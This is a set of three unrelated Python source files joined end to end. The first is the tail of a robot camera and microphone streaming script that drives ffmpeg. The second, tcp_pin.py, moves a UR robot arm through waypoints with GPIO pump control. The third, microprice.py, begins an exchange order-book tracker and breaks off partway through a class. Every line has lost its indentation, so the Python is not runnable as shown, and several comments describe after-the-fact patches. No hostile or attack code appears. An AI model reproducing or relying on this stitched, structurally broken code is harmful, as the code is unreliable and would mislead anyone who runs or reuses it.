parser.add_argument('--brightness', type=int, help='camera brightness')
parser.add_argument('--contrast', type=int, help='camera contrast')
parser.add_argument('--saturation', type=int, help='camera saturation')
parser.add_argument('--rotate180', default=False, type=bool, help='rotate image 180 degrees')
parser.add_argument('--env', default="prod")
parser.add_argument('--screen-capture', dest='screen_capture', action='store_true') # tells Windows to pull from a different camera; this should just be replaced with a video input device option
parser.set_defaults(screen_capture=False)
parser.add_argument('--no-mic', dest='mic_enabled', action='store_false')
parser.set_defaults(mic_enabled=True)
parser.add_argument('--restart-on-video-fail', dest='restart_on_video_fail', action='store_true')
parser.set_defaults(restart_on_video_fail=False)
parser.add_argument('--no-audio-restart', dest='audio_restart_enabled', action='store_false')
parser.set_defaults(audio_restart_enabled=True)
parser.add_argument('--no-camera', dest='camera_enabled', action='store_false')
parser.set_defaults(camera_enabled=True)
parser.add_argument('--dry-run', dest='dry_run', action='store_true')
parser.add_argument('--mic-channels', type=int, help='microphone channels, typically 1 or 2', default=1)
parser.add_argument('--audio-input-device', default='Microphone (HD Webcam C270)') # currently, this option is only used for windows screen capture
parser.add_argument('--stream-key', default='hellobluecat')
parser.add_argument('--ffmpeg-path', default='/usr/local/bin/ffmpeg')
parser.add_argument('--usb-reset-id', default=None)
charCount = {}
lastCharCount = None
commandArgs = parser.parse_args()
#print("sleeping")
#time.sleep(commandArgs.video_device_number * 2) # this is so they don't run at the same time if you start many simultaneously
#workingVideoDevices = video_util.findWorkingVideoDevices()
robotSettings = None
resolutionChanged = False
currentXres = None
currentYres = None
apiServer = commandArgs.api_url
websocketSFU = None
audioProcess = None
videoProcess = None
#from socketIO_client import SocketIO, LoggingNamespace
# enable raspicam driver in case a raspicam is being used
os.system("sudo modprobe bcm2835-v4l2")
def sayInfo(message):
f = open("/tmp/tempfile", "w")
f.write(message)
f.close()
os.system("espeak -a 20 -p 160 -f /tmp/tempfile -ven-sc+f3 test --stdout | aplay -D plughw:3,0")
os.unlink("/tmp/tempfile")
def reader(pipe, queue):
try:
with pipe:
#for line in iter(pipe.readline, b''):
# queue.put((pipe, line))
while True:
c = pipe.read(1)
if not c:
print("End of file")
break
#print("Read a character:", c)
queue.put((pipe, c))
finally:
queue.put(None)
def printOutput(label, q):
global charCount
charCount[label] = 0
for _ in range(2):
for source, line in iter(q.get, None):
print(line.decode("utf-8"), end="")
charCount[label] += 1
#print(label + "(" + str(charCount[label]) + ")", end="")
#print("%s %s: %s" % (label, source, line))
def runAndMonitor(label, command):
process = Popen(command, stdout=PIPE, stderr=PIPE, bufsize=1)
q = Queue()
Thread(target=reader, args=[process.stdout, q]).start()
Thread(target=reader, args=[process.stderr, q]).start()
Thread(target=printOutput, args=[label, q]).start()
return process
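# How the pattern above hangs together: both pipes of the child feed one
# queue, a single thread drains and prints it, and charCount advances with
# every character so checkForStuckProcesses() below can treat a silent
# ffmpeg as hung. A hypothetical call, just for shape:
#
#   proc = runAndMonitor("demo", ["ffmpeg", "-version"])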
def getVideoEndpoint():
url = '%s/v1/get_endpoint/jsmpeg_video_capture/%s' % (apiServer, commandArgs.camera_id)
response = robot_util.getWithRetry(url)
return json.loads(response)
def getAudioEndpoint():
url = '%s/v1/get_endpoint/jsmpeg_audio_capture/%s' % (apiServer, commandArgs.camera_id)
response = robot_util.getWithRetry(url)
return json.loads(response)
def getVideoSFU():
url = '%s/v1/get_endpoint/webrtc_sfu/100' % (apiServer)
response = robot_util.getWithRetry(url)
return json.loads(response)
def getOnlineRobotSettings(robotID):
url = '%s/api/v1/robots/%s' % (apiServer, robotID)
response = robot_util.getWithRetry(url)
return json.loads(response)
def randomSleep():
"""A short wait is good for quick recovery, but sometimes a longer delay is needed or it will just keep
trying and failing short intervals, like because the system thinks the port is still in use and every retry
makes the system think it's still in use. So, this has a high likelihood of picking a short interval,
but will pick a long one sometimes."""
timeToWait = random.choice((0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 1))
t = timeToWait * 12.0
print("sleeping", t, "seconds")
time.sleep(t)
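# Worked numbers for the distribution above: 6 of the 15 choices wait
# 0.25 * 12 = 3s, 8 of 15 wait 0.5 * 12 = 6s, and 1 of 15 waits 12s,
# so the mean restart delay is (6*3 + 8*6 + 1*12) / 15 = 5.2 seconds.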
def startVideoCaptureLinux():
videoEndpoint = getVideoEndpoint()
videoHost = videoEndpoint['host']
videoPort = videoEndpoint['port']
print("start video capture, video endpoint:", videoEndpoint)
# set brightness
if (robotSettings.brightness is not None):
print("brightness")
os.system("v4l2-ctl -c brightness={brightness}".format(brightness=robotSettings.brightness))
# set contrast
if (robotSettings.contrast is not None):
print("contrast")
os.system("v4l2-ctl -c contrast={contrast}".format(contrast=robotSettings.contrast))
# set saturation
if (robotSettings.saturation is not None):
print("saturation")
os.system("v4l2-ctl -c saturation={saturation}".format(saturation=robotSettings.saturation))
videoCommandLine = '{ffmpeg_path} -f v4l2 -framerate 25 -video_size {xres}x{yres} -r 25 -i /dev/video{video_device_number} {rotation_option} \
-f mpegts -codec:v mpeg1video -b:v {kbps}k -bf 0 -muxdelay 0.001 http://{video_host}:{video_port}/{stream_key}/{xres}/{yres}/'\
.format(ffmpeg_path=robotSettings.ffmpeg_path, video_device_number=robotSettings.video_device_number, rotation_option=rotationOption(),\
kbps=robotSettings.kbps, video_host=videoHost, video_port=videoPort, xres=robotSettings.xres, yres=robotSettings.yres, stream_key=robotSettings.stream_key)
print(videoCommandLine)
#return subprocess.Popen(shlex.split(videoCommandLine))
return runAndMonitor("video", shlex.split(videoCommandLine))
startAudioCounter = 0
def startAudioCaptureLinux():
global startAudioCounter
audioEndpoint = getAudioEndpoint()
audioHost = audioEndpoint['host']
audioPort = audioEndpoint['port']
# if a comma delimited list of rates is given, this
# switches the rate each time this is called. for some reason this makes a C920 work more reliably
# particularly on cornbot
if ',' in robotSettings.audio_rate:
rates = robotSettings.audio_rate.split(',')
audioRate = int(rates[startAudioCounter % len(rates)])
startAudioCounter += 1
else:
audioRate = int(robotSettings.audio_rate)
audioDevNum = robotSettings.audio_device_number
if robotSettings.audio_device_name is not None:
audioDevNum = audio_util.getAudioRecordingDeviceByName(robotSettings.audio_device_name)
if audioDevNum is None:
raise Exception("the name doesn't exist" + robotSettings.audio_device_name)
print((robotSettings.ffmpeg_path, audioRate, robotSettings.mic_channels, audioDevNum, audioHost, audioPort, robotSettings.stream_key))
#audioCommandLine = '%s -f alsa -ar 44100 -ac %d -i hw:%d -f mpegts -codec:a mp2 -b:a 32k -muxdelay 0.001 http://%s:%s/%s/640/480/' % (robotSettings.ffmpeg_path, robotSettings.mic_channels, audioDevNum, audioHost, audioEndpoint['port'], robotSettings.stream_key)
audioCommandLine = '%s -f alsa -ar %d -ac %d -i hw:%d -f mpegts -codec:a mp2 -b:a 64k -muxdelay 0.01 http://%s:%s/%s/640/480/'\
% (robotSettings.ffmpeg_path, audioRate, robotSettings.mic_channels, audioDevNum, audioHost, audioPort, robotSettings.stream_key)
print(audioCommandLine)
if commandArgs.usb_reset_id is not None:
if len(commandArgs.usb_reset_id) == 8:
vendor_id=int(commandArgs.usb_reset_id[0:4], 16)
product_id=int(commandArgs.usb_reset_id[4:], 16)
dev=finddev(idVendor=vendor_id, idProduct=product_id)
dev.reset()
#return subprocess.Popen(shlex.split(audioCommandLine))
return runAndMonitor("audio", shlex.split(audioCommandLine))
def rotationOption():
if robotSettings.rotate180:
return "-vf transpose=2,transpose=2"
else:
return ""
def onCommandToRobot(*args):
global robotID
if len(args) > 0 and 'robot_id' in args[0] and args[0]['robot_id'] == robotID:
commandMessage = args[0]
print('command for this robot received:', commandMessage)
command = commandMessage['command']
if command == 'VIDOFF':
print('disabling camera capture process')
print("args", args)
robotSettings.camera_enabled = False
os.system("killall ffmpeg")
if command == 'VIDON':
print('enabling camera capture process')
print("args", args)
robotSettings.camera_enabled = True
sys.stdout.flush()
def onConnection(*args):
print('connection:', args)
sys.stdout.flush()
def onRobotSettingsChanged(*args):
print('---------------------------------------')
print('set message received:', args)
refreshFromOnlineSettings()
def killallFFMPEGIn30Seconds():
time.sleep(30)
os.system("killall ffmpeg")
#todo, this needs to work differently. likely the configuration will be json and pull in stuff from command line rather than the other way around.
def overrideSettings(commandArgs, onlineSettings):
global resolutionChanged
global currentXres
global currentYres
resolutionChanged = False
c = copy.deepcopy(commandArgs)
print("onlineSettings:", onlineSettings)
if 'mic_enabled' in onlineSettings:
c.mic_enabled = onlineSettings['mic_enabled']
if 'xres' in onlineSettings:
if currentXres != onlineSettings['xres']:
resolutionChanged = True
c.xres = onlineSettings['xres']
currentXres = onlineSettings['xres']
if 'yres' in onlineSettings:
if currentYres != onlineSettings['yres']:
resolutionChanged = True
c.yres = onlineSettings['yres']
currentYres = onlineSettings['yres']
print("onlineSettings['mic_enabled']:", onlineSettings['mic_enabled'])
return c
def refreshFromOnlineSettings():
global robotSettings
global resolutionChanged
print("refreshing from online settings")
#onlineSettings = getOnlineRobotSettings(robotID)
#robotSettings = overrideSettings(commandArgs, onlineSettings)
robotSettings = commandArgs
if not robotSettings.mic_enabled:
print("KILLING**********************")
if audioProcess is not None:
print("KILLING**********************")
audioProcess.kill()
if resolutionChanged:
print("KILLING VIDEO DUE TO RESOLUTION CHANGE**********************")
if videoProcess is not None:
print("KILLING**********************")
videoProcess.kill()
else:
print("NOT KILLING***********************")
def checkForStuckProcesses():
global lastCharCount
global videoProcess
if lastCharCount is not None:
if robotSettings.camera_enabled:
videoInfoRate = charCount['video'] - lastCharCount['video']
print("video info rate:", videoInfoRate)
if abs(videoInfoRate) < 10:
print("video process has stopped outputting info")
print("KILLING VIDEO PROCESS")
videoProcess.kill()
if robotSettings.mic_enabled and robotSettings.protocol == 'jsmpeg':
audioInfoRate = charCount['audio'] - lastCharCount['audio']
print("audio info rate:", audioInfoRate)
if abs(audioInfoRate) < 10:
print("audio process has stopped outputting info")
print("KILLING AUDIO PROCESS")
audioProcess.kill()
print("ffmpeg output character count:", charCount)
lastCharCount = copy.deepcopy(charCount)
def startRTCffmpeg(videoEndpoint, SSRCV, audioEndpoint, SSRCA):
# set brightness
if (robotSettings.brightness is not None):
print("brightness")
os.system("v4l2-ctl -c brightness={brightness}".format(brightness=robotSettings.brightness))
# set contrast
if (robotSettings.contrast is not None):
print("contrast")
os.system("v4l2-ctl -c contrast={contrast}".format(contrast=robotSettings.contrast))
# set saturation
if (robotSettings.saturation is not None):
print("saturation")
os.system("v4l2-ctl -c saturation={saturation}".format(saturation=robotSettings.saturation))
audioDevNum = robotSettings.audio_device_number
if robotSettings.audio_device_name is not None:
audioDevNum = audio_util.getAudioRecordingDeviceByName(robotSettings.audio_device_name)
if robotSettings.protocol == 'video/VP8':
#ffmpeg -h encoder=libvpx
videoParameters = '-c:v libvpx \
{VPXextraParams} \
-tune psnr \
-deadline realtime \
-quality realtime \
-cpu-used 16 \
-pix_fmt yuv420p \
-b:v {kbps}k \
-preset ultrafast \
-map 0:v:0'\
.format(kbps=robotSettings.kbps,
VPXextraParams=robotSettings.VPXextraParams)
else:
#ffmpeg -h encoder=libx264
videoParameters = '-c:v libx264 \
-pix_fmt yuv420p \
-vsync 2 \
-x264-params "{h264codecParams}" \
-b:v {kbps}k -minrate {kbps}k -maxrate {kbps}k -bufsize 2M \
-preset {h264preset} \
{h264extraParams}\
-g 50 \
-map 0:v:0'\
.format(kbps=robotSettings.kbps,
h264codecParams=robotSettings.h264codecParams,
h264preset=robotSettings.h264preset,
h264extraParams=robotSettings.h264extraParams)
videoCommandLine = '{ffmpeg_path} \
-f v4l2 -video_size {xres}x{yres} -r {framerate} -i /dev/video{video_device_number} {rotation_option} \
-f alsa -i hw:{audio_device_number} \
{video} \
-c:a libopus \
-b:a {kbpsAudio}k \
-async 1 \
-preset ultrafast \
-map 1:a:0 \
-f tee "[select=a:f=rtp:ssrc={SSRCA}:payload_type=100]rtp://{audio_host}:{audio_port}|[select=v:f=rtp:ssrc={SSRCV}:payload_type=101]rtp://{video_host}:{video_port}"'\
.format(ffmpeg_path=robotSettings.ffmpeg_path,
video_device_number=robotSettings.video_device_number,
xres=robotSettings.xres,
yres=robotSettings.yres,
framerate=robotSettings.framerate,
audio_device_number=audioDevNum,
rotation_option=rotationOption(),
video=videoParameters,
kbpsAudio=robotSettings.kbps_audio,
audio_host=audioEndpoint['localIp'], audio_port=audioEndpoint['localPort'],
video_host=videoEndpoint['localIp'], video_port=videoEndpoint['localPort'],
SSRCA=SSRCA, SSRCV=SSRCV)
print(videoCommandLine)
return runAndMonitor("video", shlex.split(videoCommandLine))
#return subprocess.Popen(shlex.split(videoCommandLine))
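# Note on the command above: ffmpeg's tee muxer splits a single encode into
# two RTP outputs, "[select=a:...]" carrying only the audio stream and
# "[select=v:...]" only the video, each stamped with its own SSRC so the SFU
# can match them to the producers announced over the signalling socket.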
def startRTCvideo():
global websocketSFU
global videoProcess
print("RTC Codec: ", robotSettings.protocol)
# convert camera_id to robot
robotID = str(int(commandArgs.camera_id) - int(100))
videoSSRC = int(random.randint(1000,9999))
audioSSRC = int(random.randint(1000,9999))
peerID = str(random.randint(100000,999999))
videoSFU = getVideoSFU()
print("robotID: ", robotID)
print("videoSSRC: ", videoSSRC)
print("audioSSRC: ", audioSSRC)
print("SFU", videoSFU)
if websocketSFU:
# close if open to dump the old transports
websocketSFU.close()
websocketSFU = rtc_signalling.SFUClient('wss://'+str(videoSFU['host'])+':'+str(videoSFU['port'])\
+'/?roomId='+robotID+'&peerId=p:robot_'+peerID, protocols=['protoo'])
websocketSFU.init(robotSettings.stream_key,
robotSettings.protocol,
videoSSRC,
audioSSRC)
websocketSFU.connect()
websocketSFU.getRouterRtpCapabilities() #n/a producer
websocketSFU.requestPlainTransportVideo()
websocketSFU.requestPlainTransportAudio()
# wait for endpoint results
while websocketSFU.videoEndpoint == False:
time.sleep(0.1) # avoid a hot busy-wait while the SFU replies
while websocketSFU.audioEndpoint == False:
time.sleep(0.1)
videoProcess = startRTCffmpeg(websocketSFU.videoEndpoint, videoSSRC, websocketSFU.audioEndpoint, audioSSRC)
return
def checkVideoDevices():
import os.path
if os.path.exists("/dev/video" + str(robotSettings.video_device_number)):
#sayInfo("video device " + str(robotSettings.video_device_number) + " exists")
pass
else:
sayInfo("video device " + str(robotSettings.video_device_number) + " is missing")
def main():
global robotID
global audioProcess
global videoProcess
numVideoRestarts = 0
numAudioRestarts = 0
count = 0
# overrides command line parameters using config file
print("args on command line:", commandArgs)
print("camera id:", commandArgs.camera_id)
refreshFromOnlineSettings()
print("args after loading from server:", robotSettings)
if robotSettings.protocol != 'jsmpeg':
robotSettings.protocol = 'video/'+str(robotSettings.protocol)
robot_util.sendCameraAliveMessage(apiServer, commandArgs.camera_id, commandArgs.stream_key)
sys.stdout.flush()
checkVideoDevices()
if robotSettings.protocol != 'jsmpeg':
# RTC
startRTCvideo()
else:
# jsmpeg
if robotSettings.camera_enabled:
if not commandArgs.dry_run:
videoProcess = startVideoCaptureLinux()
else:
videoProcess = DummyProcess()
if robotSettings.mic_enabled:
if not commandArgs.dry_run:
audioProcess = startAudioCaptureLinux()
if commandArgs.audio_restart_enabled:
_thread.start_new_thread(killallFFMPEGIn30Seconds, ())
#appServerSocketIO.emit('send_video_process_start_event', {'camera_id': commandArgs.camera_id})
else:
audioProcess = DummyProcess()
# loop forever and monitor status of ffmpeg processes
while True:
print("-----------------" + str(count) + "-----------------")
#todo: start using this again
#appServerSocketIO.wait(seconds=1)
time.sleep(1)
# todo jsmpeg: reporting ffmpeg_process_exists below is not technically accurate; the
# server code would need to check send_video_process_exists instead, because the ffmpeg
# process doesn't always exist (e.g. when the relay has not started yet).
# send status to server
######appServerSocketIO.emit('send_video_status', {'send_video_process_exists': True,
###### 'ffmpeg_process_exists': True,
###### 'camera_id':commandArgs.camera_id})
if numVideoRestarts > 20:
if commandArgs.restart_on_video_fail:
print("rebooting in 20 seconds because of too many restarts. probably lost connection to camera")
time.sleep(20)
os.system("sudo reboot")
if count % 20 == 0:
try:
with os.fdopen(os.open('/tmp/send_video_summary.txt', os.O_WRONLY | os.O_CREAT, 0o777), 'w') as statusFile:
statusFile.write("time" + str(datetime.datetime.now()) + "\n")
statusFile.write("video process poll " + str(videoProcess.poll()) + " pid " + str(videoProcess.pid) + " restarts " + str(numVideoRestarts) + " \n")
statusFile.write("audio process poll " + str(audioProcess.poll()) + " pid " + str(audioProcess.pid) + " restarts " + str(numAudioRestarts) + " \n")
print("status file written")
sys.stdout.flush()
except:
print("status file could not be written")
traceback.print_exc()
sys.stdout.flush()
if (count % robot_util.KeepAlivePeriod) == 0:
print("")
print("sending camera alive message")
print("")
robot_util.sendCameraAliveMessage(apiServer,
commandArgs.camera_id,
robotSettings.stream_key)
if (count % 2) == 0:
checkForStuckProcesses()
# poll when jsmpeg and rtc
if robotSettings.camera_enabled and videoProcess:
print("video process poll", videoProcess.poll(), "pid", videoProcess.pid, "restarts", numVideoRestarts)
# restart video if needed
if videoProcess.poll() is not None:
randomSleep()
if robotSettings.protocol != 'jsmpeg':
print("RESTART RTC")
startRTCvideo()
else:
#jsmpeg restart
videoProcess = startVideoCaptureLinux()
numVideoRestarts += 1
else:
print("video process poll: camera_enabled is false")
# only poll when jsmpeg; rtc has no audio process
if robotSettings.mic_enabled and robotSettings.protocol == 'jsmpeg':
if audioProcess is None:
print("audio process poll: audioProcess object is None")
else:
print("audio process poll", audioProcess.poll(), "pid", audioProcess.pid, "restarts", numAudioRestarts)
# restart audio if needed
if (audioProcess is None) or (audioProcess.poll() is not None):
randomSleep()
audioProcess = startAudioCaptureLinux()
#time.sleep(30)
#appServerSocketIO.emit('send_video_process_start_event', {'camera_id': commandArgs.camera_id})
numAudioRestarts += 1
else:
print("audio process poll: mic_enabled is false")
count += 1
main()
|
tcp_pin.py | import socket
import time
import math
import rtde_control
import rtde_receive
import cv2
import pyrealsense2
import threading
import RPi.GPIO as GPIO
switch = 18
pump = 7
GPIO.setmode(GPIO.BOARD)
GPIO.setup(switch, GPIO.IN,pull_up_down=GPIO.PUD_UP)
GPIO.setup(pump, GPIO.OUT)
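# BOARD numbering addresses physical header pins: pin 18 is BCM GPIO24
# (the switch input, pulled up) and pin 7 is BCM GPIO4 (the pump output).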
#####################################################
def movRobot(tcpPose, v, a, asnc):
rtde_c.moveL(tcpPose[0], v, a, False)
rtde_c.moveL(tcpPose[1], v, a, True)
while (not GPIO.input(switch)):
print("not pressed")
rtde_c.moveL(tcpPose[2], v, a, False)
rtde_c.moveL(tcpPose[3], v, a, False)
rtde_c.moveL(tcpPose[4], v, a, False)
print("Turn Off Pump")
# time.sleep(2)
rtde_c.moveL(tcpPose[5], v, a, False)
rtde_c.moveL(tcpPose[6], v, a, False)
if(GPIO.input(switch)):
print("Button Pressed")
GPIO.output(pump,GPIO.HIGH) # assumption: the original wrote to an undefined `led`; pump is the only configured output pin
else:
print("not pressed")
GPIO.output(pump,GPIO.LOW)
def movRobotPath(tcpPose, asnc):
rtde_c.moveL(tcpPose, v, a, asnc) # v/a are the module-level speed and acceleration; the original passed asnc as the speed argument
print("MOVING TO POSITION")
def BSFunction(tcpPose):
rtde_c.moveL(tcpPose, False)
rtde_c.moveL(tcpPose, True)
def stopRobt():
rtde_c.stopJ(2.0)
def getForce():
rst = rtde_c.zeroFtSensor()
print(rst, "=== Force Reset")
for i in range(5):
contact = rtde_r.getActualTCPForce()
print("Current Force Values ", contact)
# print("Forces #",i," ->",contact,rtde_c.isSteady())
time.sleep(0.5)
# while (contact[2] > 20):
# contact = rtde_r.getActualTCPForce()
# stopRobt()
#####################################################
# UR COMM CODE
HOST = "10.0.0.6" # The remote host
PORT = 30002
rtde_c = rtde_control.RTDEControlInterface(HOST)
rtde_r = rtde_receive.RTDEReceiveInterface(HOST)
###################################################
v = 2
a = 0.3
blend =0.00
print("Connection: ",rtde_c.isConnected())
# coordinates
move_joints_1 = [-0.5,-0.22,0.3,2.89,-1.29,0.126]
move_joints_2 = [-0.5,-0.22,0.4,2.89,-1.29,0.126]
drop = [ 0.145, -0.623, 0.0479, 3.09, 0.0169, -0.041]
placing = [ 0.116, -0.559, 0.4300, 3.10, 0.0169, -0.050]
# placing1 = [-0.252, -0.511, 0.4300, 2.95, -0.9491, -0.063]
home = [-0.537, -0.193, 0.4300, 2.40, -2.0000, -0.079] # We might not need this
marker1 = [-0.695, -0.215, 0.1416, 2.34, -2.1194, -0.041]
marker2 = [-0.698, -0.105, 0.1351, 2.16, -2.2841, -0.060]
marker3 = [-0.703, -0.023, 0.154, 1.95, -2.48, -0.02]
marker4 = [-0.693, -0.128, 0.141, 1.77, -2.63, -0.00]
package1 = [-0.693, -0.128, 0.141, 1.77, -2.63, -0.00]
package2 = [-0.645, 0.136, 0.096, 1.21, -2.94, 0.03]
package3 = [-0.425, 0.130, 0.096, 0.93, -2.96, 0.02]
# marker5 = [-0.678, -0.218, 0.1440, 1.56, -2.6799, -0.170]
# marker6 = [-0.582, -0.229, 0.1388, 1.47, -2.7888, -0.060]
# marker7 = [-0.581, -0.135, 0.1331, 1.65, -2.6666, -0.089]
# marker8 = [-0.695, -0.215, 0.1416, 2.34, -2.1194, -0.041]
# marker9 = [-0.695, -0.215, 0.1416, 2.34, -2.1194, -0.041]
coordinates = []
# MUST APPEND IN ORDER OF PATH TRAVELLING
coordinates.append(home) # 0
coordinates.append(package1) # 1
coordinates.append(home) # 2
coordinates.append(placing) # 3
coordinates.append(drop) # 4
coordinates.append(placing) # 5
coordinates.append(home) # 6
coordinates.append(package2)
coordinates.append(home)
coordinates.append(placing)
coordinates.append(drop)
coordinates.append(placing)
coordinates.append(home)
coordinates.append(package3)
coordinates.append(home)
coordinates.append(placing)
coordinates.append(drop)
coordinates.append(placing)
coordinates.append(home)
# coordinates.append(home)
# coordinates.append(marker2)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker3)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker4)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker5)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker6)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker7)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(move_joints_1)
# coordinates.append(move_joints_2)
# # coordinates.append(placing1)
# coordinates.append(placing)
# coordinates.append(drop)
# append velocity, acceleration, blend to each coordinate vector
# for waypoints in coordinates:
# waypoints.append(v)
# waypoints.append(a)
# waypoints.append(blend)
# move_joints_1.append(v)
# move_joints_1.append(a)
# move_joints_1.append(0.0)
# move_joints_2.append(v)
# move_joints_2.append(a)
# move_joints_2.append(0.0)
# drop.append(v)
# drop.append(a)
# drop.append(0.0)
# placing.append(v)
# placing.append(a)
# placing.append(0.0)
# home.append(v)
# home.append(a)
# home.append(0.0)
###########################
# Creates path by packing in order of coordinates
path = []
for waypoints in coordinates:
path.append(waypoints)
path.append(home)
# # path.append(placing1)
# path.append(home)
# combined.append(move_joints_1)
# combined.append(move_joints_2)
# combined.append(placing)
# combined.append(drop)
# combined.append(home)
# runs = rtde_c.moveL(move_joints_2,v,a,False)
# Spawning thread for movement
move = threading.Thread(target = movRobot, args = (coordinates,v,a,False))
move.start()
# for i in range(9):
# movePath = threading.Thread(target = movRobotPath, args = (path,False))
# movePath.start()
# movePath.join()
# FREE MODE
# rtde_c.teachMode()
# time.sleep(300)
# EndFreedrive Mode
rtde_c.endTeachMode()
time.sleep(5)
# print("5 seconds done - getting force")
# force = threading.Thread(target = getForce)
# force.start()
# stop = threading.Thread(target = stopRobt)
# stop.start()
# tcp = rtde_r.getTargetTCPPose()
# print ("tcp",tcp)
# rtde_c.stopJ(2.0)
###################################################
### EVERYTHING BELOW DOES NOT WORK OR IS SUPPOSED TO INTEGRATE WITH THE DEPTH CAMERA
# while True:
# #show distance for a specific point
# # (X,Y)
# ret,depth_frame,color_frame = dc.get_frame()
# cv2.circle(color_frame, point,4,(0,0,255))
# # [y] [x] when using cv2
# distance = depth_frame[point[1],[point[0]]]
# cv2.putText(color_frame,"{}mm".format(distance),(point[0],point[1]-20),cv2.FONT_HERSHEY_PLAIN,2,(0,255,0),2)
# cv2.imshow("depth frame",depth_frame)
# cv2.imshow("Color frame", color_frame )
# cv2.waitKey(1)
# while (runs):
#tcp = rtde_r.getTargetTCPPose()
#print ("tcp",tcp)
# direction = [0.00,0.00,1.001,0.001,0.001,1.001]
# contact = rtde_r.getActualTCPForce()
#print ("Force",contact)
#print ("Force",contact[2])
#if((contact[2] < -10 ) or (contact[2] > 30 ) ):
# runs = False
# rtde_c.stopJ(2.0)
# time.sleep(5)
#actual_q = rtde_r.getActualQ()
#print ("Move Joint Angles:",actual_q)
|
microprice.py | #!/usr/bin/env python3
import ssl
import os
import sys
import optparse
import websocket
from threading import Thread
import logging
import json
from enum import Enum
from random import randint
import datetime as dt
import time
from math import fabs
import socket
import numpy as np
from numpy_ringbuffer import RingBuffer
WS_TIMEOUT = 5
BINANCE_URL = "wss://stream.binance.com:9443/ws"
#BINANCE_SNAP_URL = "https://www.binance.com/api/v1/depth?limit=1000&"
BITFINEX_URL = "wss://api.bitfinex.com/ws/2"
GDAX_QA_URL = "wss://ws-feed-public.sandbox.gdax.com"
GDAX_URL = "wss://ws-feed.gdax.com"
LOG_FORMAT = '%(asctime)s|%(name)-8s|%(thread)-6d|%(levelname)-6s|%(message)s'
LOG_FOLDER = "c:/temp"
class log_formatter(logging.Formatter):
converter=dt.datetime.fromtimestamp
def formatTime(self, record, datefmt=None):
ct = self.converter(record.created)
if datefmt:
s = ct.strftime(datefmt)
else:
t = ct.strftime("%Y-%m-%d %H:%M:%S")
s = "%s,%03d" % (t, record.msecs)
return s
class channel_state(Enum):
NONE = 0
SUBSCRIBING = 1
SUBSCRIBED = 2
UNSUBSCRIBING = 3
class market(Enum):
FINEX = 0
GDAX = 1
BINANCE = 2
class channel_data:
def __init__(self, name):
self.name_ = name
self.id_ = 0
self.status_ = channel_state.NONE
class price_channel(channel_data):
def __init__(self, name, symbol):
super().__init__(name)
self.symbol_ = symbol
class price_level:
def __init__(self, price, qty, orders):
self.price_ = price
self.qty_ = qty
self.orders_ = orders
def __str__(self):
return "%.2f @ %.2f" % (self.qty_, self.price_)
def update_side(arr, price, qty, orders, descending=False):
# update an existing level, drop it when its order count reaches zero,
# or insert an unseen price keeping the side sorted (bids descend, asks ascend)
for i in range(0, len(arr)):
if arr[i].price_ == price:
if orders == 0: # removal
arr.pop(i)
return
else:
arr[i] = price_level(price, qty, orders)
return
if orders != 0: # unseen price: insert it and re-sort the side
arr.append(price_level(price, qty, orders))
arr.sort(key=lambda l: l.price_, reverse=descending)
class order_book:
def __init__(self):
self.bids_ = []
self.asks_ = []
self.synced_ = False
self.open_ = 0.0
self.low_ = 0.0
self.high_ = 0.0
self.last_traded_ = RingBuffer(100, dtype=float)
def is_synced(self):
return self.synced_
def top(self):
return [self.bids_[0] if len(self.bids_) > 0 else [],
self.asks_[0] if len(self.asks_) > 0 else []]
def sanity_check(self):
if len(self.bids_) > 0:
for i in self.bids_:
assert i.qty_ > 0
if len(self.asks_) > 0:
for i in self.asks_:
assert i.qty_ > 0
if len(self.bids_) > 0 and len(self.asks_) > 0:
assert self.bids_[0].price_ < self.asks_[0].price_
return True
class finex_order_book(order_book):
def __init__(self):
super().__init__()
def update_internal(self, data):
assert len(data) == 3
if data[2] > 0: # bids
update_side(self.bids_, data[0], data[2], data[1], descending=True)
else: # ask
update_side(self.asks_, data[0], fabs(data[2]), data[1])
def update(self, data):
if isinstance(data[0], list):
for d in data[0]:
self.update_internal(d)
else:
self.update_internal(data)
assert self.sanity_check()
def snapshot(self, data):
self.bids_ = []
self.asks_ = []
for i in data:
assert len(i) == 3
if i[2] > 0: # bids
self.bids_.append(price_level(i[0], i[2], i[1]))
else: # ask
self.asks_.append(price_level(i[0], fabs(i[2]), i[1]))
self.synced_ = True
assert self.sanity_check()
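# Illustrative snapshot rows (added for clarity; Bitfinex book entries are
# [price, order count, signed amount], positive amounts are bids and
# negative amounts are asks):
#
#   book = finex_order_book()
#   book.snapshot([[100.0, 2, 1.5], [100.1, 1, -0.7]])
#   bid, ask = book.top()
#   print(bid, ask)   # -> 1.50 @ 100.00  0.70 @ 100.10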
class gdax_order_book(order_book):
def __init__(self):
super().__init__()
def update(self, data):
for d in data:
qty = float(d[2])
if d[0] == 'buy':
update_side(self.bids_, float(d[1]), qty, 1 if qty != 0 else 0, descending=True)
else:
update_side(self.asks_, float(d[1]), qty, 1 if qty != 0 else 0)
assert self.sanity_check()
def snapshot(self, bids, asks):
self.bids_ = [ price_level(float(l[0]), float(l[1]), 1) for l in bids ]
self.asks_ = [ price_level(float(l[0]), float(l[1]), 1) for l in asks ]
self.synced_ = True
assert self.sanity_check()
def trade(self, data):
self.open_ = float(data['open_24h'])
self.low_ = float(data['low_24h'])
self.high_ = float(data['high_24h'])
self.last_traded_.append(float(data['price']))
class binance_order_book(order_book):
def __init__(self):
super().__init__()
def update(self, data):
self.bids_ = [ price_level(float(level[0]), float(level[1]), 1) for level in data['bids'] ]
self.asks_ = [ price_level(float(level[0]), float(level[1]), 1) for level in data['asks'] ]
self.synced_ = True
assert self.sanity_check()
class instrument:
def __init__(self, id, mdsymbols):
self.id_ = id
self.mdsymbols_ = mdsymbols
self.order_books_ = {}
self.order_books_[market.FINEX] = finex_order_book()
self.order_books_[market.GDAX] = gdax_order_book()
